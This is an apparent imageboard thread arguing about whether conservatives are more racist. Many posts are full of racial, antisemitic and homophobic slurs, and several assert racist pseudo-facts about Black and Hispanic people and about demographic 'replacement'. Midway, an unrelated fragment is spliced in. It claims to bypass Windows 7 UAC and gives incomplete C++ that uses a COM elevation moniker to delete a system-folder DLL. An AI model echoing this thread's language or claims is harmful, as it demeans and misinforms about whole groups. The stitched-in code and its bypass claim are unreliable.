Why do conservashits tend to be more racists?

why do conservashits tend to be more racists?

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I think it's just that they don't pander quite so much.

Why is nigger-speak so fucking illiterate?

First you explain how Sessions is a racist and we'll go from there.

It doesn't matter in the long run. Conservashitism is a dying breed. Soon we won't have to worry about their outdated ideologies and impaired reasoning.

Because racism is truth.

The guy speaks with a southern accent, of course he's racist. Do you guys even watch tv?

Obvious troll is obvious.

only rural and suburban retards vote conservative

Because they are analytical rather than emotional.

I'm 37 and I've been hearing that dumb shit since I was in 1st grade.

Lo and behold, 30+ years later and conservatives are in total control of the federal government and most of the state governorships.

Young people don't stay stupid forever.

The truth isn't racist, you intellectually devoid nigger

Because they are conserving the traditional old view of prejudice against certain races

pretty simple really

I think it's just their own language they use to communicate with eachother.

Same here
it is the same issue with projected demographics
these faggots tell us that in 2050 we'll be outnumbered, think again cucks. all the babies I see in my area are 9/10 white

I'd say it's because they don't try quite as hard as liberals to hide their true feelings. Liberals pander hardcore.

White "racism" is just honesty.

>these faggots tell us that in 2050 we'll be outnumbered, think again cucks. all the babies I see in my area are 9/10 white

Meanwhile, my area is suddenly being swamped with niglets being raised by single white mothers. It's like this shit happened overnight, it's pretty fucked.

This is true to some degree. They do absolutely have a higher birthrate and lower age of birth than whites, but I have a feeling that the more brown muck that is generated within our borders the faster they will socially degenerate when compared to white children.

I live in a state with a lot of hispanics, and by a lot I mean over half of the population. I tend to notice that a higher percentage of them are gay/lesbian, very socially awkward and off-putting, or simply borderline retarded (seriously, not trying to be funny).

I truly believe that they will skew their own demographics.

wish I could send help m8

It just seems like they want to openly impress white men now... Will we stop it?

That is true as well, I used to work in CA and my spic co-workers loathed the cost of kids and one of them even went lengths to remind me how shitty mexican and latino women are, a few would talk about leaving once Trump got elected (thank God)

>the co-worker found himself a chubby SJW instead

Did they leave?


>The truth isn't racist
What? Of course it is!

because we know better

Generally smarter.

I'm still trying to figure that one out, I left that job months ago. Too many illegals I had to deal with.

One of the managers that was only here for a few months really had a scared look on her face when we mentioned Trump,white kid next to her was laughing his ass off

the south is sure filled with trailer park intellectuals , Cletus

>cherry picking
spoken like a true demoshit

I do not accept the premise your question is predicated upon.

>go to college
>rack up 200k in debt
>get a degree
>still vote for a globalist, marxist, traitor

So what you're saying is that you can stay in the trailer park all your life and still end up the smarter one? Good call.

You must be in an alternate universe or something you delusional cunt

>Conservatives don't think blacks should be babied and at least think they're smart enough to get voter ID on their own
>Conservatives will vote for a person based on more than their skin color
>Liberals will blindly vote based on skin color and identity politics
>Liberals will crucify anybody that challenges identity politics or steps off the plantation
>Liberals were responsible for slavery, Jim Crow, segregation and welfare
>Liberals think ALL immigrants are illegal mexicans
>Liberals don't understand that latinos can be from many different ethnicities
>Liberals believe fully in "the white man's burden" while simultaneously hating the white man
>Liberals complain that blacks are too stupid to get voter ID to vote and that they can't do anything without big daddy government to help them
>Libs are racist against whites in addition to brown people
>Libs usually shame masculinity and manhood in addition to supporting Islam, which punishes women more than any right winger would want

Gee, OP, I always thought republicans were pretty O.K. to me actually.

i wouldnt call gender studies a degree

>muh globalist boogeyman
> clearly votes against their economic interests being poor and voting for more billionaire elite tax cuts

dont let your trailer park explode from all the cooking meth and shit , dense faggot

>still listens to cnn
>still doesnt know about the globalists
do you know where you are?

a neo nazi weeboo board for sad beta virgin conservative faggots?

kinda like that communist board for sad beta virgin liberals known as facebook

stfu fag

is she really that fat know or just good shooping?


Execute any function with administrative privileges on Windows 7, while bypassing the UAC permission window, which generally asks permission before executing with administrative privileges


HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, void **ppv)
WCHAR wszMon[300];

StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID)/sizeof(wszCLSID[0]));
HRESULT hr = StringCchPrintfW(wszMon, sizeof(wszMon)/sizeof(wszMon[0]), L"Elevation:Administrator!new:%s", wszCLSID);
if (FAILED(hr))
return hr;
memset(&bo, 0, sizeof(bo));
bo.cbStruct = sizeof(bo);
bo.hwnd = hwnd;
bo.dwClassContext = CLSCTX_LOCAL_SERVER;
return CoGetObject(wszMon, &bo, riid, ppv);

void ElevatedDelete()

// This is only availabe on Vista and higher
IFileOperation *pfo;
hr = CoCreateInstanceAsAdmin(NULL, CLSID_FileOperation, IID_PPV_ARGS(&pfo));
IShellItem *item = NULL;
hr = SHCreateItemFromParsingName(L"C:\\WINDOWS\\TEST.DLL", NULL, IID_PPV_ARGS(&item));
pfo->DeleteItem(item, NULL);



i don't advise keeping the audio on.

>yet every globalist admits globalism and one-world policies are what they're advocating
>being so dumb that you have evidence in front of you and ignore it

>my economic interests haven't been revealed, yet you think you can assume them, then tell me how I should feel about them
>being so dumb that you are convinced you're smarter than everyone that disagrees with you

I feel for you kiddo, we've all been manipulated by the kikes. I know your impotent rage is just aching inside of you,
like you just wanna go save every African child in the world and promptly virtue signal to everyone what you did, I know.
I know you just want Chad inside of your wife nightly, and have a gaggle of mulatto children. I know kiddo. We all have dreams.

But that isn't the way forward, and you'll be forgotten soon enough.

>this blob wants to play barbie

how does licking boots taste like , Cletus?

how does protesting the police then wanting more police taste jamal?

What is this, vbscript or something?

Have you seen that video about lefties thoughts on voter ID?

Black people don't know where the DMV is, they don't carry ID, they can't use the internet, etc.

Everyone's racist


Because we use the power of observation.

I'd put it in ms piggy's butt hole just to hear the piggy squeel

I think it was sarcasm.

you just stooped below op's level

I think many of our Hispanic population is here illegally. I just keep on hearing Hispanics say that half my family is here illegally you can't deport them. We are fucked as a country tbqh.